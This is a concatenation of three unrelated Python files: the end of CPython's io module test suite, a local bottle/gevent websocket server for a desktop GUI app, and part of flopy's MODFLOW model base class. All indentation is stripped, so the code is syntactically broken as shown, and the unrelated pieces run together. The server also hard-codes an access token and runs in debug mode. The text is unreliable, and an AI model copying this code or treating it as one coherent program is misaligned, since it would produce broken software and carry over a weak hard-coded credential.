{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
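# Dropping the last reference to an open file must emit a ResourceWarning
# that names the file.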
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
server.py
|
from pathlib import Path
from zipfile import ZipFile
from util import unfuck_pythonw
import sys
import os
import logging
import bottle
import json
import gevent
import gevent.queue
import gevent.pywsgi
import gevent.threadpool
import multiprocessing
from geventwebsocket import WebSocketError
import geventwebsocket
import geventwebsocket.websocket
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.logging import create_logger
import contextlib
try:
import webview
use_webview = True
except ImportError:
use_webview = False
import app
def start(port=0):
multiprocessing.set_start_method('spawn')
bottle.debug(True)
bottle_app = bottle.Bottle()
logger = create_logger('geventwebsocket.logging')
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
logger.propagate = False
if app.app_archive:
zf = ZipFile(app.app_archive, 'r')
print(zf.namelist())
print(zf.getinfo('webgui2/dist/index.html'))
def serve_file(path):
try:
print('serving', path, 'from', 'webgui2/dist/' + path)
info = zf.getinfo('webgui2/dist/' + path)
if info.is_dir():
return bottle.HTTPError(403)
size = info.file_size
bottle.response.content_length = size
bottle.response.content_type = bottle.mimetypes.guess_type(path)[0]
return zf.open(info, 'r')
except KeyError:
return bottle.HTTPError(404)
except:
import traceback
traceback.print_exc()
else:
root = Path(__file__).parent.joinpath('dist')
def serve_file(path):
return bottle.static_file(path, root)
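    # Editor's note (descriptive, not part of the original source): when the app
    # runs from a packed archive (app.app_archive), static assets are read
    # straight out of the zip under 'webgui2/dist/'; otherwise they are served
    # from the 'dist' directory next to this file.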
httpsock = gevent.socket.socket(gevent.socket.AF_INET, gevent.socket.SOCK_STREAM)
httpsock.bind(('127.0.0.1', port))
httpsock.listen()
token = '1145141919'
@bottle_app.route("/")
def serve_root():
return serve_file("index.html")
@bottle_app.route('/itemimg/<name>.png')
def itemimg(name):
logger.info('serving file %s', name)
import imgreco.itemdb
imgreco.itemdb.update_extra_items()
items = imgreco.itemdb.all_known_items
itemres = items.get(name, None)
if itemres:
bottle.response.content_type = 'image/png'
return itemres.open()
else:
            return bottle.HTTPError(404)
def readws(ws):
while True:
try:
msg = ws.receive()
except WebSocketError:
return None
if msg is not None:
if not isinstance(msg, str):
continue
try:
obj = json.loads(msg)
except:
logger.error("invalid JSON")
continue
logger.debug("received request %r", obj)
return obj
else:
return None
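    # Editor's note (sketch, not part of the original source): readws expects each
    # client frame to be a JSON-encoded object with at least a "type" field; the
    # authorization handshake handled below, for example, looks like
    #     {"type": "web:authorize", "token": "<token printed with the URL>"}
    # Non-text frames and malformed JSON are skipped; a closed socket yields None.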
@bottle_app.route("/ws")
def rpc_endpoint():
wsock : geventwebsocket.websocket.WebSocket = bottle.request.environ.get('wsgi.websocket')
if not wsock:
bottle.abort(400, 'Expected WebSocket request.')
authorized = False
wsock.send('{"type":"need-authorize"}')
while True:
try:
obj = readws(wsock)
if obj is None:
break
request_type = obj.get('type', None)
if request_type == 'web:authorize':
client_token = obj.get('token', None)
if client_token == token:
authorized = True
break
except WebSocketError:
break
if authorized:
logger.info('client authorized')
from .worker_launcher import worker_process
inq = multiprocessing.Queue()
outq = multiprocessing.Queue()
p = multiprocessing.Process(target=worker_process, args=(inq, outq), daemon=True)
logger.info('spawning worker process')
p.start()
pool : gevent.threadpool.ThreadPool = gevent.get_hub().threadpool
error = False
logger.info('starting worker loop')
outqread = pool.spawn(outq.get)
wsread = gevent.spawn(readws, wsock)
while not error:
for task in gevent.wait((outqread, wsread), count=1):
if task is outqread:
try:
outval = outqread.get()
except:
logger.error('read worker output failed with exception', exc_info=True)
error = True
break
gevent.spawn(wsock.send, json.dumps(outval))
outqread = pool.spawn(outq.get)
elif task is wsread:
try:
obj = wsread.get()
except:
logger.error('read message from websocket failed with exception', exc_info=True)
error = True
break
if obj is None:
error = True
break
wsread = gevent.spawn(readws, wsock)
pool.spawn(inq.put, obj)
logger.info('worker loop stopped')
with contextlib.suppress(Exception):
gevent.kill(wsread)
wsock.close()
inq.put_nowait(None)
p.kill()
@bottle_app.route("/<filepath:path>")
def serve_static(filepath):
return serve_file(filepath)
group = gevent.pool.Pool()
server = gevent.pywsgi.WSGIServer(httpsock, bottle_app, handler_class=WebSocketHandler, log=logger, spawn=group)
url = f'http://{server.address[0]}:{server.address[1]}/?token={token}'
print(url)
server_task = gevent.spawn(server.serve_forever)
if port != 0:
server_task.get()
return
from .webhost import get_host
host = get_host()
host.start(url, 1080, 820)
if host.wait_handle:
        # neither gevent nor pywebview likes running off the main thread
webview_task = gevent.get_hub().threadpool.spawn(host.wait_handle)
webview_task.wait()
else:
idlechk_interval = getattr(host, 'poll_interval', 60)
idlecount = 1
while True:
gevent.sleep(idlechk_interval)
if len(group) == 0:
idlecount += 1
else:
idlecount = 0
if idlecount >= 3:
print("stopping idle server")
break
# gevent.util.print_run_info()
server.stop()
if __name__ == '__main__':
start()
|
mbase.py
|
"""
mbase module
This module contains the base model class from which
all of the other models inherit from.
"""
from __future__ import print_function
import abc
import sys
import os
import shutil
import threading
import warnings
import queue as Queue
from datetime import datetime
from shutil import which
from subprocess import Popen, PIPE, STDOUT
import copy
import numpy as np
from flopy import utils, discretization
from .version import __version__
from .discretization.modeltime import ModelTime
from .discretization.grid import Grid
# Global variables
iconst = 1 # Multiplier for individual array elements in integer and real arrays read by MODFLOW's U2DREL, U1DREL and U2DINT.
iprn = -1 # Printout flag. If >= 0 then array values read are printed in listing file.
class FileDataEntry(object):
def __init__(self, fname, unit, binflag=False, output=False, package=None):
self.fname = fname
self.unit = unit
self.binflag = binflag
self.output = output
self.package = package
class FileData(object):
def __init__(self):
self.file_data = []
return
def add_file(self, fname, unit, binflag=False, output=False, package=None):
ipop = []
for idx, file_data in enumerate(self.file_data):
if file_data.fname == fname or file_data.unit == unit:
ipop.append(idx)
self.file_data.append(FileDataEntry(fname, unit, binflag=binflag,
output=output, package=package))
return
class ModelInterface(object):
def __init__(self):
self._mg_resync = True
self._modelgrid = None
def update_modelgrid(self):
if self._modelgrid is not None:
self._modelgrid = Grid(proj4=self._modelgrid.proj4,
xoff=self._modelgrid.xoffset,
yoff=self._modelgrid.yoffset,
angrot=self._modelgrid.angrot)
self._mg_resync = True
@property
@abc.abstractmethod
def modelgrid(self):
raise NotImplementedError(
'must define modelgrid in child '
'class to use this base class')
@property
@abc.abstractmethod
def packagelist(self):
raise NotImplementedError(
'must define packagelist in child '
'class to use this base class')
@property
@abc.abstractmethod
def namefile(self):
raise NotImplementedError(
'must define namefile in child '
'class to use this base class')
@property
@abc.abstractmethod
def model_ws(self):
raise NotImplementedError(
'must define model_ws in child '
'class to use this base class')
@property
@abc.abstractmethod
def exename(self):
raise NotImplementedError(
'must define exename in child '
'class to use this base class')
@property
@abc.abstractmethod
def version(self):
raise NotImplementedError(
'must define version in child '
'class to use this base class')
@property
@abc.abstractmethod
def solver_tols(self):
raise NotImplementedError(
            'must define solver_tols in child '
'class to use this base class')
@abc.abstractmethod
def export(self, f, **kwargs):
raise NotImplementedError(
'must define export in child '
'class to use this base class')
@property
@abc.abstractmethod
def laytyp(self):
raise NotImplementedError(
'must define laytyp in child '
'class to use this base class')
@property
@abc.abstractmethod
def hdry(self):
raise NotImplementedError(
'must define hdry in child '
'class to use this base class')
@property
@abc.abstractmethod
def hnoflo(self):
raise NotImplementedError(
'must define hnoflo in child '
'class to use this base class')
@property
@abc.abstractmethod
def laycbd(self):
raise NotImplementedError(
'must define laycbd in child '
'class to use this base class')
@property
@abc.abstractmethod
def verbose(self):
raise NotImplementedError(
'must define verbose in child '
'class to use this base class')
@abc.abstractmethod
def check(self, f=None, verbose=True, level=1):
raise NotImplementedError(
'must define check in child '
'class to use this base class')
def get_package_list(self, ftype=None):
"""
Get a list of all the package names.
Parameters
----------
ftype : str
Type of package, 'RIV', 'LPF', etc.
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
val = []
for pp in (self.packagelist):
if ftype is None:
val.append(pp.name[0].upper())
elif pp.package_type.lower() == ftype:
val.append(pp.name[0].upper())
return val
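    # Example (editor's sketch, not part of the original source; package names are
    # illustrative only):
    #
    #     >>> m.get_package_list()             # e.g. ['DIS', 'BAS6', 'LPF', 'RIV']
    #     >>> m.get_package_list(ftype='riv')  # e.g. ['RIV']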
def _check(self, chk, level=1):
"""
Check model data for common errors.
        Parameters
        ----------
        chk : check object
            An existing flopy.utils.check instance to which model-level
            results and package-level check summaries are added.
        level : int
            Check method analysis level. If level=0, summary checks are
            performed. If level=1, full checks are performed.
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
results = {}
for p in self.packagelist:
if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
results[p.name[0]] = p.check(f=None, verbose=False,
level=level - 1,
checktype=chk.__class__)
# model level checks
# solver check
if self.version in chk.solver_packages.keys():
solvers = set(chk.solver_packages[self.version]).intersection(
set(self.get_package_list()))
if not solvers:
chk._add_to_summary('Error', desc='\r No solver package',
package='model')
elif len(list(solvers)) > 1:
for s in solvers:
chk._add_to_summary('Error',
desc='\r Multiple solver packages',
package=s)
else:
chk.passed.append('Compatible solver package')
# add package check results to model level check summary
for r in results.values():
if r is not None and r.summary_array is not None: # currently SFR doesn't have one
chk.summary_array = np.append(chk.summary_array,
r.summary_array).view(
np.recarray)
chk.passed += ['{} package: {}'.format(r.package.name[0], psd)
for psd in r.passed]
chk.summarize()
return chk
class BaseModel(ModelInterface):
"""
MODFLOW based models base class
Parameters
----------
modelname : string
Name of the model. Model files will be given this name. (default is
        'modflowtest')
namefile_ext : string
name file extension (default is 'nam')
exe_name : string
name of the modflow executable
model_ws : string
Path to the model workspace. Model files will be created in this
directory. Default is None, in which case model_ws is assigned
to the current working directory.
"""
def __init__(self, modelname='modflowtest', namefile_ext='nam',
exe_name='mf2k.exe', model_ws=None,
structured=True, verbose=False, **kwargs):
"""
BaseModel init
"""
ModelInterface.__init__(self)
self.__name = modelname
self.namefile_ext = namefile_ext or ''
self._namefile = self.__name + '.' + self.namefile_ext
self._packagelist = []
self.heading = ''
self.exe_name = exe_name
self._verbose = verbose
self.external_path = None
self.external_extension = 'ref'
if model_ws is None: model_ws = os.getcwd()
if not os.path.exists(model_ws):
try:
os.makedirs(model_ws)
except:
print(
'\n{0:s} not valid, workspace-folder was changed to {1:s}\n'.format(
model_ws, os.getcwd()))
model_ws = os.getcwd()
self._model_ws = model_ws
self.structured = structured
self.pop_key_list = []
self.cl_params = ''
# check for reference info in kwargs
# we are just carrying these until a dis package is added
xll = kwargs.pop("xll", None)
yll = kwargs.pop("yll", None)
self._xul = kwargs.pop("xul", None)
self._yul = kwargs.pop("yul", None)
if self._xul is not None or self._yul is not None:
warnings.warn('xul/yul have been deprecated. Use xll/yll instead.',
DeprecationWarning)
self._rotation = kwargs.pop("rotation", 0.0)
self._proj4_str = kwargs.pop("proj4_str", None)
self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")
# build model discretization objects
self._modelgrid = Grid(proj4=self._proj4_str, xoff=xll, yoff=yll,
angrot=self._rotation)
self._modeltime = None
# Model file information
self.__onunit__ = 10
# external option stuff
self.array_free_format = True
self.free_format_input = True
self.parameter_load = False
self.array_format = None
self.external_fnames = []
self.external_units = []
self.external_binflag = []
self.external_output = []
self.package_units = []
self._next_ext_unit = None
# output files
self.output_fnames = []
self.output_units = []
self.output_binflag = []
self.output_packages = []
return
@property
def modeltime(self):
raise NotImplementedError(
'must define modeltime in child '
'class to use this base class')
@property
def modelgrid(self):
raise NotImplementedError(
'must define modelgrid in child '
'class to use this base class')
@property
def packagelist(self):
return self._packagelist
@packagelist.setter
def packagelist(self, packagelist):
self._packagelist = packagelist
@property
def namefile(self):
return self._namefile
@namefile.setter
def namefile(self, namefile):
self._namefile = namefile
@property
def model_ws(self):
return self._model_ws
@model_ws.setter
def model_ws(self, model_ws):
self._model_ws = model_ws
@property
def exename(self):
return self._exename
@exename.setter
def exename(self, exename):
self._exename = exename
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def verbose(self):
return self._verbose
@verbose.setter
def verbose(self, verbose):
self._verbose = verbose
@property
def laytyp(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").laytyp.array
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").laycon.array
if self.get_package("UPW") is not None:
return self.get_package("UPW").laytyp.array
return None
@property
def hdry(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").hdry
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").hdry
if self.get_package("UPW") is not None:
return self.get_package("UPW").hdry
return None
@property
def hnoflo(self):
try:
bas6 = self.get_package("BAS6")
return bas6.hnoflo
except AttributeError:
return None
@property
def laycbd(self):
try:
dis = self.get_package("DIS")
return dis.laycbd.array
except AttributeError:
return None
# we don't need these - no need for controlled access to array_free_format
# def set_free_format(self, value=True):
# """
# Set the free format flag for the model instance
#
# Parameters
# ----------
# value : bool
# Boolean value to set free format flag for model. (default is True)
#
# Returns
# -------
#
# """
# if not isinstance(value, bool):
# print('Error: set_free_format passed value must be a boolean')
# return False
# self.array_free_format = value
#
# def get_free_format(self):
# """
# Return the free format flag for the model
#
# Returns
# -------
# out : bool
# Free format flag for the model
#
# """
# return self.array_free_format
def next_unit(self, i=None):
if i is not None:
self.__onunit__ = i - 1
else:
self.__onunit__ += 1
return self.__onunit__
def next_ext_unit(self):
"""
Function to encapsulate next_ext_unit attribute
"""
next_unit = self._next_ext_unit + 1
self._next_ext_unit += 1
return next_unit
def export(self, f, **kwargs):
"""
Method to export a model to netcdf or shapefile based on the
extension of the file name (.shp for shapefile, .nc for netcdf)
Parameters
----------
f : str
filename
kwargs : keyword arguments
modelgrid : flopy.discretization.Grid instance
user supplied modelgrid which can be used for exporting
in lieu of the modelgrid associated with the model object
Returns
-------
None or Netcdf object
"""
from .export import utils
return utils.model_export(f, self, **kwargs)
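    # Example (editor's sketch, not part of the original source): the export
    # format is inferred from the file extension, so for a model instance m:
    #
    #     >>> m.export('model.shp')  # shapefile export
    #     >>> m.export('model.nc')   # NetCDF export (typically needs the netCDF4 package)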
def add_package(self, p):
"""
Add a package.
Parameters
----------
p : Package object
"""
for idx, u in enumerate(p.unit_number):
if u != 0:
if u in self.package_units or u in self.external_units:
try:
pn = p.name[idx]
except:
pn = p.name
if self.verbose:
msg = "\nWARNING:\n unit {} ".format(u) + \
"of package {} ".format(pn) + \
"already in use."
print(msg)
self.package_units.append(u)
for i, pp in enumerate(self.packagelist):
if pp.allowDuplicates:
continue
elif isinstance(p, type(pp)):
if self.verbose:
print("\nWARNING:\n Two packages of the same type, " +
"Replacing existing " +
"'{}' package.".format(p.name[0]))
self.packagelist[i] = p
return
if self.verbose:
print('adding Package: ', p.name[0])
